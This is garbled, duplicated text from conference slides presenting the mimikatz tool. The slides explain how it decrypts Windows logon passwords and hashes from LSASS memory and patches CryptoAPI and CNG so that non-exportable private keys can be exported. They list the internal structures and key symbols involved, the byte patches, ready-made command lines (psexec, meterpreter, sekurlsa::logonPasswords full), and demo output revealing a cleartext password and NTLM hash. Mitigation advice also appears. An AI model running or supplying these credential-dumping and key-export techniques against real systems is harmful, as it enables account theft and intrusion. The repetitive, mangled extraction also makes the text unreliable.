07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
